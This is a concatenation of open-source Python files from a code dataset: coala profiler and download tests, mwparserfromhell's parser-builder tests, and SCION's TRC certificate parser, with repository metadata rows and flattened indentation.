self.assertIsNone(bear.run_bear_from_section(args, kwargs))
dump_stats.assert_called_with(join(os.getcwd(),
'name_TestThreeBear.prof'))
@patch('cProfile.Profile.dump_stats')
def test_profiler_with_directory_exists(self, dump_stats):
args = ()
kwargs = {}
section = Section('name')
with TemporaryDirectory() as temp_dir:
section.append(Setting('profile', temp_dir))
bear = TestTwoBear(section, self.queue)
self.assertEqual(bear.run_bear_from_section(args, kwargs),
[1, 2, 3])
dump_stats.assert_called_once_with(os.path.join(
bear.profile, 'name_TestTwoBear.prof'))
def test_profiler_with_file_path(self):
args = ()
kwargs = {}
section = Section('name')
with NamedTemporaryFile() as temp_file:
section.append(Setting('profile', temp_file.name))
bear = TestTwoBear(section, self.queue)
with self.assertRaises(SystemExit) as context:
bear.run_bear_from_section(args, kwargs)
self.assertEqual(context.exception.code, 2)
def test_profiler_with_debugger(self):
section = Section('name')
section.append(Setting('debug_bears', 'tRuE'))
section.append(Setting('profile', 'tRuE'))
with self.assertRaisesRegex(
ValueError,
'Cannot run debugger and profiler at the same time.'):
Bear(section, self.queue)
@patch('coalib.bears.Bear.Bear.profile_run')
def test_profiler_with_false_setting(self, profile_run):
args = ()
kwargs = {}
section = Section('name')
section.append(Setting('profile', '0'))
bear = TestThreeBear(section, self.queue)
self.assertIsNone(bear.run_bear_from_section(args, kwargs))
assert not profile_run.called
def test_is_profiled(self):
with self.assertRaisesRegex(
ValueError,
'Positional argument bear is not an instance of Bear class.'):
_is_profiled(bear=None)
section = Section('name')
uut = Bear(section, self.queue)
self.assertEqual(_is_profiled(uut), False)
section.append(Setting('profile', 'tRuE'))
self.assertEqual(_is_profiled(uut), os.getcwd())
section.append(Setting('profile', '0'))
self.assertEqual(_is_profiled(uut), False)
section.append(Setting('profile', 'dirpath'))
self.assertEqual(_is_profiled(uut), 'dirpath')
def test_setting_is_enabled(self):
with self.assertRaisesRegex(
ValueError,
'Positional argument bear is not an instance of Bear class.'):
_setting_is_enabled(bear=None, key='key')
section = Section('name')
uut = Bear(section, self.queue)
with self.assertRaisesRegex(ValueError, 'No setting key passed.'):
_setting_is_enabled(bear=uut, key=None)
self.assertFalse(_setting_is_enabled(bear=uut, key='key'))
section.append(Setting('key', 'value'))
self.assertEqual(_setting_is_enabled(bear=uut, key='key'),
uut.section['key'])
section.append(Setting('key', 'tRuE'))
self.assertEqual(_setting_is_enabled(bear=uut, key='key'), True)
section.append(Setting('key', '0'))
self.assertEqual(_setting_is_enabled(bear=uut, key='key'), False)
def test_profiler_dependency(self, debug=False):
with bear_test_module():
with prepare_file(['#fixme '], None) as (lines, filename):
results = run_coala(console_printer=ConsolePrinter(),
log_printer=LogPrinter(),
arg_list=(
'-c', os.devnull,
'-f', filename,
'-b', 'DependentBear',
'-S', 'use_spaces=yeah',
'--profile', 'profiled_bears',
),
autoapply=False,
debug=debug)
cli_result = results[0]['cli']
self.assertEqual(len(cli_result), 1)
profiled_files = os.listdir('profiled_bears')
self.assertEqual(len(profiled_files), 1)
self.assertEqual(profiled_files[0], 'cli_SpaceConsistencyTestBear.prof')
shutil.rmtree('profiled_bears')
class BrokenReadHTTPResponse(BytesIO):
def __init__(self, chunks, *args, **kwargs):
self.read_count = 0
self.chunks = chunks
def read(self, *args, **kwargs):
# A HTTPResponse will return an empty string when you read from it
# after the socket has been closed.
if self.closed:
return b''
if self.read_count == len(self.chunks):
raise requests.exceptions.ReadTimeout('Fake read timeout')
self.read_count += 1
return self.chunks[self.read_count - 1]
class BearDownloadTest(BearTestBase):
def setUp(self):
super().setUp()
self.mock_url = 'https://test.com'
self.filename = 'test.html'
self.teapot_url = 'https://www.google.com/teapot'
# 'https://httpstat.us/418' and
# http://httpbin.org/status/418 also work
self.file_location = join(self.uut.data_dir, self.filename)
def test_connection_timeout_mocked(self):
exc = requests.exceptions.ConnectTimeout
with requests_mock.Mocker() as reqmock:
reqmock.get(self.mock_url, exc=exc)
with self.assertRaisesRegex(exc, '^$'):
self.uut.download_cached_file(
self.mock_url, self.filename)
def test_read_broken(self):
exc = (
requests.exceptions.RequestException,
)
fake_content = [b'Fake read data', b'Another line']
fake_content_provider = BrokenReadHTTPResponse(fake_content)
self.assertFalse(isfile(self.file_location))
with requests_mock.Mocker() as reqmock:
reqmock.get(self.mock_url, body=fake_content_provider)
with self.assertRaisesRegex(exc, 'Fake read timeout'):
self.uut.download_cached_file(
self.mock_url, self.filename)
self.assertTrue(isfile(self.file_location))
with open(self.file_location, 'rb') as fh:
self.assertEqual(fh.read(), b''.join(fake_content))
def test_status_code_error(self):
exc = requests.exceptions.HTTPError
with self.assertRaisesRegex(exc, '^418 '):
self.uut.download_cached_file(
self.teapot_url, self.filename)
def test_download_cached_file(self):
mock_url = 'https://test.com'
mock_text = """<html>
<p> lorem impsum dolor</p>
</html>"""
filename = self.filename
file_location = self.file_location
with freeze_time('2017-01-01') as frozen_datetime:
with requests_mock.Mocker() as reqmock:
reqmock.get(mock_url, text=mock_text)
self.assertFalse(isfile(file_location))
expected_filename = file_location
result_filename = self.uut.download_cached_file(mock_url,
filename)
self.assertTrue(isfile(join(file_location)))
self.assertEqual(result_filename, expected_filename)
expected_time = getmtime(file_location)
frozen_datetime.tick(delta=datetime.timedelta(seconds=0.5))
result_filename = self.uut.download_cached_file(mock_url,
filename)
self.assertEqual(result_filename, expected_filename)
result_time = getmtime(file_location)
self.assertEqual(result_time, expected_time)
| agpl-3.0 | -7,395,492,256,786,567,000 | 38.126394 | 80 | 0.590911 | false |
SunghanKim/mwparserfromhell | tests/test_builder.py | 3 | 21872 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Ben Kurtovic <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import unicode_literals
try:
import unittest2 as unittest
except ImportError:
import unittest
from mwparserfromhell.compat import py3k
from mwparserfromhell.nodes import (Argument, Comment, ExternalLink, Heading,
HTMLEntity, Tag, Template, Text, Wikilink)
from mwparserfromhell.nodes.extras import Attribute, Parameter
from mwparserfromhell.parser import tokens, ParserError
from mwparserfromhell.parser.builder import Builder
from ._test_tree_equality import TreeEqualityTestCase, wrap, wraptext
class TestBuilder(TreeEqualityTestCase):
"""Tests for the builder, which turns tokens into Wikicode objects."""
def setUp(self):
self.builder = Builder()
def test_text(self):
"""tests for building Text nodes"""
tests = [
([tokens.Text(text="foobar")], wraptext("foobar")),
([tokens.Text(text="fóóbar")], wraptext("fóóbar")),
([tokens.Text(text="spam"), tokens.Text(text="eggs")],
wraptext("spam", "eggs")),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_template(self):
"""tests for building Template nodes"""
tests = [
([tokens.TemplateOpen(), tokens.Text(text="foobar"),
tokens.TemplateClose()],
wrap([Template(wraptext("foobar"))])),
([tokens.TemplateOpen(), tokens.Text(text="spam"),
tokens.Text(text="eggs"), tokens.TemplateClose()],
wrap([Template(wraptext("spam", "eggs"))])),
([tokens.TemplateOpen(), tokens.Text(text="foo"),
tokens.TemplateParamSeparator(), tokens.Text(text="bar"),
tokens.TemplateClose()],
wrap([Template(wraptext("foo"), params=[
Parameter(wraptext("1"), wraptext("bar"), showkey=False)])])),
([tokens.TemplateOpen(), tokens.Text(text="foo"),
tokens.TemplateParamSeparator(), tokens.Text(text="bar"),
tokens.TemplateParamEquals(), tokens.Text(text="baz"),
tokens.TemplateClose()],
wrap([Template(wraptext("foo"), params=[
Parameter(wraptext("bar"), wraptext("baz"))])])),
([tokens.TemplateOpen(), tokens.TemplateParamSeparator(),
tokens.TemplateParamSeparator(), tokens.TemplateParamEquals(),
tokens.TemplateParamSeparator(), tokens.TemplateClose()],
wrap([Template(wrap([]), params=[
Parameter(wraptext("1"), wrap([]), showkey=False),
Parameter(wrap([]), wrap([]), showkey=True),
Parameter(wraptext("2"), wrap([]), showkey=False)])])),
([tokens.TemplateOpen(), tokens.Text(text="foo"),
tokens.TemplateParamSeparator(), tokens.Text(text="bar"),
tokens.TemplateParamEquals(), tokens.Text(text="baz"),
tokens.TemplateParamSeparator(), tokens.Text(text="biz"),
tokens.TemplateParamSeparator(), tokens.Text(text="buzz"),
tokens.TemplateParamSeparator(), tokens.Text(text="3"),
tokens.TemplateParamEquals(), tokens.Text(text="buff"),
tokens.TemplateParamSeparator(), tokens.Text(text="baff"),
tokens.TemplateClose()],
wrap([Template(wraptext("foo"), params=[
Parameter(wraptext("bar"), wraptext("baz")),
Parameter(wraptext("1"), wraptext("biz"), showkey=False),
Parameter(wraptext("2"), wraptext("buzz"), showkey=False),
Parameter(wraptext("3"), wraptext("buff")),
Parameter(wraptext("3"), wraptext("baff"),
showkey=False)])])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_argument(self):
"""tests for building Argument nodes"""
tests = [
([tokens.ArgumentOpen(), tokens.Text(text="foobar"),
tokens.ArgumentClose()],
wrap([Argument(wraptext("foobar"))])),
([tokens.ArgumentOpen(), tokens.Text(text="spam"),
tokens.Text(text="eggs"), tokens.ArgumentClose()],
wrap([Argument(wraptext("spam", "eggs"))])),
([tokens.ArgumentOpen(), tokens.Text(text="foo"),
tokens.ArgumentSeparator(), tokens.Text(text="bar"),
tokens.ArgumentClose()],
wrap([Argument(wraptext("foo"), wraptext("bar"))])),
([tokens.ArgumentOpen(), tokens.Text(text="foo"),
tokens.Text(text="bar"), tokens.ArgumentSeparator(),
tokens.Text(text="baz"), tokens.Text(text="biz"),
tokens.ArgumentClose()],
wrap([Argument(wraptext("foo", "bar"), wraptext("baz", "biz"))])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_wikilink(self):
"""tests for building Wikilink nodes"""
tests = [
([tokens.WikilinkOpen(), tokens.Text(text="foobar"),
tokens.WikilinkClose()],
wrap([Wikilink(wraptext("foobar"))])),
([tokens.WikilinkOpen(), tokens.Text(text="spam"),
tokens.Text(text="eggs"), tokens.WikilinkClose()],
wrap([Wikilink(wraptext("spam", "eggs"))])),
([tokens.WikilinkOpen(), tokens.Text(text="foo"),
tokens.WikilinkSeparator(), tokens.Text(text="bar"),
tokens.WikilinkClose()],
wrap([Wikilink(wraptext("foo"), wraptext("bar"))])),
([tokens.WikilinkOpen(), tokens.Text(text="foo"),
tokens.Text(text="bar"), tokens.WikilinkSeparator(),
tokens.Text(text="baz"), tokens.Text(text="biz"),
tokens.WikilinkClose()],
wrap([Wikilink(wraptext("foo", "bar"), wraptext("baz", "biz"))])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_external_link(self):
"""tests for building ExternalLink nodes"""
tests = [
([tokens.ExternalLinkOpen(brackets=False),
tokens.Text(text="http://example.com/"),
tokens.ExternalLinkClose()],
wrap([ExternalLink(wraptext("http://example.com/"),
brackets=False)])),
([tokens.ExternalLinkOpen(brackets=True),
tokens.Text(text="http://example.com/"),
tokens.ExternalLinkClose()],
wrap([ExternalLink(wraptext("http://example.com/"))])),
([tokens.ExternalLinkOpen(brackets=True),
tokens.Text(text="http://example.com/"),
tokens.ExternalLinkSeparator(), tokens.ExternalLinkClose()],
wrap([ExternalLink(wraptext("http://example.com/"), wrap([]))])),
([tokens.ExternalLinkOpen(brackets=True),
tokens.Text(text="http://example.com/"),
tokens.ExternalLinkSeparator(), tokens.Text(text="Example"),
tokens.ExternalLinkClose()],
wrap([ExternalLink(wraptext("http://example.com/"),
wraptext("Example"))])),
([tokens.ExternalLinkOpen(brackets=False),
tokens.Text(text="http://example"), tokens.Text(text=".com/foo"),
tokens.ExternalLinkClose()],
wrap([ExternalLink(wraptext("http://example", ".com/foo"),
brackets=False)])),
([tokens.ExternalLinkOpen(brackets=True),
tokens.Text(text="http://example"), tokens.Text(text=".com/foo"),
tokens.ExternalLinkSeparator(), tokens.Text(text="Example"),
tokens.Text(text=" Web Page"), tokens.ExternalLinkClose()],
wrap([ExternalLink(wraptext("http://example", ".com/foo"),
wraptext("Example", " Web Page"))])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_html_entity(self):
"""tests for building HTMLEntity nodes"""
tests = [
([tokens.HTMLEntityStart(), tokens.Text(text="nbsp"),
tokens.HTMLEntityEnd()],
wrap([HTMLEntity("nbsp", named=True, hexadecimal=False)])),
([tokens.HTMLEntityStart(), tokens.HTMLEntityNumeric(),
tokens.Text(text="107"), tokens.HTMLEntityEnd()],
wrap([HTMLEntity("107", named=False, hexadecimal=False)])),
([tokens.HTMLEntityStart(), tokens.HTMLEntityNumeric(),
tokens.HTMLEntityHex(char="X"), tokens.Text(text="6B"),
tokens.HTMLEntityEnd()],
wrap([HTMLEntity("6B", named=False, hexadecimal=True,
hex_char="X")])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_heading(self):
"""tests for building Heading nodes"""
tests = [
([tokens.HeadingStart(level=2), tokens.Text(text="foobar"),
tokens.HeadingEnd()],
wrap([Heading(wraptext("foobar"), 2)])),
([tokens.HeadingStart(level=4), tokens.Text(text="spam"),
tokens.Text(text="eggs"), tokens.HeadingEnd()],
wrap([Heading(wraptext("spam", "eggs"), 4)])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_comment(self):
"""tests for building Comment nodes"""
tests = [
([tokens.CommentStart(), tokens.Text(text="foobar"),
tokens.CommentEnd()],
wrap([Comment(wraptext("foobar"))])),
([tokens.CommentStart(), tokens.Text(text="spam"),
tokens.Text(text="eggs"), tokens.CommentEnd()],
wrap([Comment(wraptext("spam", "eggs"))])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_tag(self):
"""tests for building Tag nodes"""
tests = [
# <ref></ref>
([tokens.TagOpenOpen(), tokens.Text(text="ref"),
tokens.TagCloseOpen(padding=""), tokens.TagOpenClose(),
tokens.Text(text="ref"), tokens.TagCloseClose()],
wrap([Tag(wraptext("ref"), wrap([]),
closing_tag=wraptext("ref"))])),
# <ref name></ref>
([tokens.TagOpenOpen(), tokens.Text(text="ref"),
tokens.TagAttrStart(pad_first=" ", pad_before_eq="",
pad_after_eq=""),
tokens.Text(text="name"), tokens.TagCloseOpen(padding=""),
tokens.TagOpenClose(), tokens.Text(text="ref"),
tokens.TagCloseClose()],
wrap([Tag(wraptext("ref"), wrap([]),
attrs=[Attribute(wraptext("name"))])])),
# <ref name="abc" />
([tokens.TagOpenOpen(), tokens.Text(text="ref"),
tokens.TagAttrStart(pad_first=" ", pad_before_eq="",
pad_after_eq=""),
tokens.Text(text="name"), tokens.TagAttrEquals(),
tokens.TagAttrQuote(char='"'), tokens.Text(text="abc"),
tokens.TagCloseSelfclose(padding=" ")],
wrap([Tag(wraptext("ref"),
attrs=[Attribute(wraptext("name"), wraptext("abc"))],
self_closing=True, padding=" ")])),
# <br/>
([tokens.TagOpenOpen(), tokens.Text(text="br"),
tokens.TagCloseSelfclose(padding="")],
wrap([Tag(wraptext("br"), self_closing=True)])),
# <li>
([tokens.TagOpenOpen(), tokens.Text(text="li"),
tokens.TagCloseSelfclose(padding="", implicit=True)],
wrap([Tag(wraptext("li"), self_closing=True, implicit=True)])),
# </br>
([tokens.TagOpenOpen(invalid=True), tokens.Text(text="br"),
tokens.TagCloseSelfclose(padding="", implicit=True)],
wrap([Tag(wraptext("br"), self_closing=True, invalid=True,
implicit=True)])),
# </br/>
([tokens.TagOpenOpen(invalid=True), tokens.Text(text="br"),
tokens.TagCloseSelfclose(padding="")],
wrap([Tag(wraptext("br"), self_closing=True, invalid=True)])),
# <ref name={{abc}} foo="bar {{baz}}" abc={{de}}f ghi=j{{k}}{{l}}
# mno = '{{p}} [[q]] {{r}}'>[[Source]]</ref>
([tokens.TagOpenOpen(), tokens.Text(text="ref"),
tokens.TagAttrStart(pad_first=" ", pad_before_eq="",
pad_after_eq=""),
tokens.Text(text="name"), tokens.TagAttrEquals(),
tokens.TemplateOpen(), tokens.Text(text="abc"),
tokens.TemplateClose(),
tokens.TagAttrStart(pad_first=" ", pad_before_eq="",
pad_after_eq=""),
tokens.Text(text="foo"), tokens.TagAttrEquals(),
tokens.TagAttrQuote(char='"'), tokens.Text(text="bar "),
tokens.TemplateOpen(), tokens.Text(text="baz"),
tokens.TemplateClose(),
tokens.TagAttrStart(pad_first=" ", pad_before_eq="",
pad_after_eq=""),
tokens.Text(text="abc"), tokens.TagAttrEquals(),
tokens.TemplateOpen(), tokens.Text(text="de"),
tokens.TemplateClose(), tokens.Text(text="f"),
tokens.TagAttrStart(pad_first=" ", pad_before_eq="",
pad_after_eq=""),
tokens.Text(text="ghi"), tokens.TagAttrEquals(),
tokens.Text(text="j"), tokens.TemplateOpen(),
tokens.Text(text="k"), tokens.TemplateClose(),
tokens.TemplateOpen(), tokens.Text(text="l"),
tokens.TemplateClose(),
tokens.TagAttrStart(pad_first=" \n ", pad_before_eq=" ",
pad_after_eq=" "),
tokens.Text(text="mno"), tokens.TagAttrEquals(),
tokens.TagAttrQuote(char="'"), tokens.TemplateOpen(),
tokens.Text(text="p"), tokens.TemplateClose(),
tokens.Text(text=" "), tokens.WikilinkOpen(),
tokens.Text(text="q"), tokens.WikilinkClose(),
tokens.Text(text=" "), tokens.TemplateOpen(),
tokens.Text(text="r"), tokens.TemplateClose(),
tokens.TagCloseOpen(padding=""), tokens.WikilinkOpen(),
tokens.Text(text="Source"), tokens.WikilinkClose(),
tokens.TagOpenClose(), tokens.Text(text="ref"),
tokens.TagCloseClose()],
wrap([Tag(wraptext("ref"), wrap([Wikilink(wraptext("Source"))]), [
Attribute(wraptext("name"),
wrap([Template(wraptext("abc"))]), None),
Attribute(wraptext("foo"), wrap([Text("bar "),
Template(wraptext("baz"))]), pad_first=" "),
Attribute(wraptext("abc"), wrap([Template(wraptext("de")),
Text("f")]), None),
Attribute(wraptext("ghi"), wrap([Text("j"),
Template(wraptext("k")),
Template(wraptext("l"))]), None),
Attribute(wraptext("mno"), wrap([Template(wraptext("p")),
Text(" "), Wikilink(wraptext("q")), Text(" "),
Template(wraptext("r"))]), "'", " \n ", " ",
" ")])])),
# "''italic text''"
([tokens.TagOpenOpen(wiki_markup="''"), tokens.Text(text="i"),
tokens.TagCloseOpen(), tokens.Text(text="italic text"),
tokens.TagOpenClose(), tokens.Text(text="i"),
tokens.TagCloseClose()],
wrap([Tag(wraptext("i"), wraptext("italic text"),
wiki_markup="''")])),
# * bullet
([tokens.TagOpenOpen(wiki_markup="*"), tokens.Text(text="li"),
tokens.TagCloseSelfclose(), tokens.Text(text=" bullet")],
wrap([Tag(wraptext("li"), wiki_markup="*", self_closing=True),
Text(" bullet")])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_integration(self):
"""a test for building a combination of templates together"""
# {{{{{{{{foo}}bar|baz=biz}}buzz}}usr|{{bin}}}}
test = [tokens.TemplateOpen(), tokens.TemplateOpen(),
tokens.TemplateOpen(), tokens.TemplateOpen(),
tokens.Text(text="foo"), tokens.TemplateClose(),
tokens.Text(text="bar"), tokens.TemplateParamSeparator(),
tokens.Text(text="baz"), tokens.TemplateParamEquals(),
tokens.Text(text="biz"), tokens.TemplateClose(),
tokens.Text(text="buzz"), tokens.TemplateClose(),
tokens.Text(text="usr"), tokens.TemplateParamSeparator(),
tokens.TemplateOpen(), tokens.Text(text="bin"),
tokens.TemplateClose(), tokens.TemplateClose()]
valid = wrap(
[Template(wrap([Template(wrap([Template(wrap([Template(wraptext(
"foo")), Text("bar")]), params=[Parameter(wraptext("baz"),
wraptext("biz"))]), Text("buzz")])), Text("usr")]), params=[
Parameter(wraptext("1"), wrap([Template(wraptext("bin"))]),
showkey=False)])])
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_integration2(self):
"""an even more audacious test for building a horrible wikicode mess"""
# {{a|b|{{c|[[d]]{{{e}}}}}}}[[f|{{{g}}}<!--h-->]]{{i|j= }}
test = [tokens.TemplateOpen(), tokens.Text(text="a"),
tokens.TemplateParamSeparator(), tokens.Text(text="b"),
tokens.TemplateParamSeparator(), tokens.TemplateOpen(),
tokens.Text(text="c"), tokens.TemplateParamSeparator(),
tokens.WikilinkOpen(), tokens.Text(text="d"),
tokens.WikilinkClose(), tokens.ArgumentOpen(),
tokens.Text(text="e"), tokens.ArgumentClose(),
tokens.TemplateClose(), tokens.TemplateClose(),
tokens.WikilinkOpen(), tokens.Text(text="f"),
tokens.WikilinkSeparator(), tokens.ArgumentOpen(),
tokens.Text(text="g"), tokens.ArgumentClose(),
tokens.CommentStart(), tokens.Text(text="h"),
tokens.CommentEnd(), tokens.WikilinkClose(),
tokens.TemplateOpen(), tokens.Text(text="i"),
tokens.TemplateParamSeparator(), tokens.Text(text="j"),
tokens.TemplateParamEquals(), tokens.HTMLEntityStart(),
tokens.Text(text="nbsp"), tokens.HTMLEntityEnd(),
tokens.TemplateClose()]
valid = wrap(
[Template(wraptext("a"), params=[Parameter(wraptext("1"), wraptext(
"b"), showkey=False), Parameter(wraptext("2"), wrap([Template(
wraptext("c"), params=[Parameter(wraptext("1"), wrap([Wikilink(
wraptext("d")), Argument(wraptext("e"))]), showkey=False)])]),
showkey=False)]), Wikilink(wraptext("f"), wrap([Argument(wraptext(
"g")), Comment(wraptext("h"))])), Template(wraptext("i"), params=[
Parameter(wraptext("j"), wrap([HTMLEntity("nbsp",
named=True)]))])])
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_parser_errors(self):
"""test whether ParserError gets thrown for bad input"""
missing_closes = [
[tokens.TemplateOpen(), tokens.TemplateParamSeparator()],
[tokens.TemplateOpen()], [tokens.ArgumentOpen()],
[tokens.WikilinkOpen()], [tokens.ExternalLinkOpen()],
[tokens.HeadingStart()], [tokens.CommentStart()],
[tokens.TagOpenOpen(), tokens.TagAttrStart()],
[tokens.TagOpenOpen()]
]
func = self.assertRaisesRegex if py3k else self.assertRaisesRegexp
msg = r"_handle_token\(\) got unexpected TemplateClose"
func(ParserError, msg, self.builder.build, [tokens.TemplateClose()])
for test in missing_closes:
self.assertRaises(ParserError, self.builder.build, test)
if __name__ == "__main__":
unittest.main(verbosity=2)
| mit | 4,305,054,947,200,492,000 | 48.475113 | 79 | 0.553366 | false |
klausman/scion | python/lib/crypto/trc.py | 1 | 14393 | # Copyright 2014 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`trc` --- SCION TRC parser
===============================================
"""
# Stdlib
import base64
import copy
import json
import os
import time
# External
import lz4
# SCION
from lib.crypto.asymcrypto import verify, sign
from lib.crypto.util import CERT_DIR
from lib.errors import SCIONParseError, SCIONVerificationError
from lib.packet.scion_addr import ISD_AS
ISD_STRING = 'ISD'
DESCRIPTION_STRING = 'Description'
VERSION_STRING = 'Version'
CREATION_TIME_STRING = 'CreationTime'
EXPIRATION_TIME_STRING = 'ExpirationTime'
CORE_ASES_STRING = 'CoreASes'
ROOT_CAS_STRING = 'RootCAs'
CERT_LOGS_STRING = 'CertLogs'
THRESHOLD_EEPKI_STRING = 'ThresholdEEPKI'
RAINS_STRING = 'RAINS'
QUORUM_TRC_STRING = 'QuorumTRC'
QUORUM_CAS_STRING = 'QuorumCAs'
GRACE_PERIOD_STRING = 'GracePeriod'
QUARANTINE_STRING = 'Quarantine'
SIGNATURES_STRING = 'Signatures'
ARPKI_KEY_STRING = 'ARPKIKey'
ARPKI_SRV_STRING = 'ARPKISrv'
CERTIFICATE_STRING = 'Certificate'
OFFLINE_KEY_ALG_STRING = 'OfflineKeyAlg'
OFFLINE_KEY_STRING = 'OfflineKey'
ONLINE_KEY_ALG_STRING = 'OnlineKeyAlg'
ONLINE_KEY_STRING = 'OnlineKey'
ROOT_RAINS_KEY_STRING = 'RootRAINSKey'
TRC_SRV_STRING = 'TRCSrv'
def get_trc_file_path(conf_dir, isd, version): # pragma: no cover
"""
Return the TRC file path for a given ISD.
"""
return os.path.join(conf_dir, CERT_DIR, 'ISD%s-V%s.trc' % (isd, version))
class TRC(object):
"""
The TRC class parses the TRC file of an ISD and stores such
information for further use.
:ivar int isd: the ISD identifier.
:ivar str description: is a human readable description of an ISD.
:ivar int version: the TRC file version.
:ivar int create_time: the TRC file creation timestamp.
:ivar int exp_time: the TRC expiration timestamp.
:ivar dict core_ases: the set of core ASes and their certificates.
:ivar dict root_cas: the set of root CAs and their certificates.
:ivar dict cert_logs: is a dictionary of end entity certificate log servers of
form {name: {"isd_as IP": pub_key}}
:ivar int threshold_eepki: is a threshold number (nonnegative integer) of
CAs that have to sign a domain’s policy
:ivar dict rains: the RAINS section.
:ivar int quorum_trc: number of core ASes necessary to sign a new TRC.
:ivar int quorum_cas: number of CAs necessary to change CA entries
:ivar int grace_period: defines for how long this TRC is valid when a new
TRC is available
:ivar bool quarantine: flag defining whether TRC is valid(quarantine=false)
or an early announcement(quarantine=true)
:ivar dict signatures: signatures generated by a quorum of trust roots.
"""
FIELDS_MAP = {
ISD_STRING: ("isd", int),
DESCRIPTION_STRING: ("description", str),
VERSION_STRING: ("version", int),
CREATION_TIME_STRING: ("create_time", int),
EXPIRATION_TIME_STRING: ("exp_time", int),
CORE_ASES_STRING: ("core_ases", dict),
ROOT_CAS_STRING: ("root_cas", dict),
CERT_LOGS_STRING: ("cert_logs", dict),
THRESHOLD_EEPKI_STRING: ("threshold_eepki", int),
RAINS_STRING: ("rains", dict),
QUORUM_TRC_STRING: ("quorum_trc", int),
QUORUM_CAS_STRING: ("quorum_cas", int),
QUARANTINE_STRING: ("quarantine", bool),
SIGNATURES_STRING: ("signatures", dict),
GRACE_PERIOD_STRING: ("grace_period", int),
}
# list of fields in a dict of dicts which have to be encoded/decoded from base64
MULTI_DICT_DECODE_FIELDS = {
CORE_ASES_STRING: [ONLINE_KEY_STRING, OFFLINE_KEY_STRING],
ROOT_CAS_STRING: [CERTIFICATE_STRING, ONLINE_KEY_STRING, ARPKI_KEY_STRING],
}
# list of fields in a dict which have to be encoded/decoded
SIMPLE_DICT_DECODE_FIELDS = {
RAINS_STRING: [ROOT_RAINS_KEY_STRING, ONLINE_KEY_STRING],
SIGNATURES_STRING: [],
}
def __init__(self, trc_dict):
"""
:param dict trc_dict: TRC as dict.
"""
for k, (name, type_) in self.FIELDS_MAP.items():
val = trc_dict[k]
if type_ in (int,):
val = int(val)
elif type_ in (dict, ):
val = copy.deepcopy(val)
setattr(self, name, val)
for attr, decode_list in self.MULTI_DICT_DECODE_FIELDS.items():
field = getattr(self, self.FIELDS_MAP[attr][0])
for entry in field.values():
for key in decode_list:
entry[key] = base64.b64decode(entry[key].encode('utf-8'))
for attr, decode_list in self.SIMPLE_DICT_DECODE_FIELDS.items():
entry = getattr(self, self.FIELDS_MAP[attr][0])
if not entry:
continue
for key in decode_list or entry:
entry[key] = base64.b64decode(entry[key].encode('utf-8'))
for subject, entry in trc_dict[CERT_LOGS_STRING].items():
try:
addr, pub_key = next(iter(entry.items()))
self.cert_logs[subject][addr] = base64.b64decode(pub_key.encode('utf-8'))
except StopIteration:
raise SCIONParseError("Invalid CertLogs entry for %s: %s", subject, entry)
def get_isd_ver(self):
return self.isd, self.version
def get_core_ases(self):
res = []
for key in self.core_ases:
res.append(ISD_AS(key))
return res
def dict(self, with_signatures):
"""
Return the TRC information.
:param bool with_signatures:
If True, include signatures in the return value.
:returns: the TRC information.
:rtype: dict
"""
trc_dict = {}
for k, (name, _) in self.FIELDS_MAP.items():
trc_dict[k] = getattr(self, name)
if not with_signatures:
del trc_dict[SIGNATURES_STRING]
return trc_dict
@classmethod
def from_raw(cls, trc_raw, lz4_=False):
if lz4_:
trc_raw = lz4.loads(trc_raw).decode("utf-8")
trc = json.loads(trc_raw)
return TRC(trc)
@classmethod
def from_values(cls, isd, description, version, core_ases, root_cas,
cert_logs, threshold_eepki, rains, quorum_trc,
quorum_cas, grace_period, quarantine, signatures, validity_period):
"""
Generate a TRC instance.
"""
now = int(time.time())
trc_dict = {
ISD_STRING: isd,
DESCRIPTION_STRING: description,
VERSION_STRING: version,
CREATION_TIME_STRING: now,
EXPIRATION_TIME_STRING: now + validity_period,
CORE_ASES_STRING: core_ases,
ROOT_CAS_STRING: root_cas,
CERT_LOGS_STRING: cert_logs,
THRESHOLD_EEPKI_STRING: threshold_eepki,
RAINS_STRING: rains,
QUORUM_TRC_STRING: quorum_trc,
QUORUM_CAS_STRING: quorum_cas,
GRACE_PERIOD_STRING: grace_period,
QUARANTINE_STRING: quarantine,
SIGNATURES_STRING: signatures,
}
trc = TRC(trc_dict)
return trc
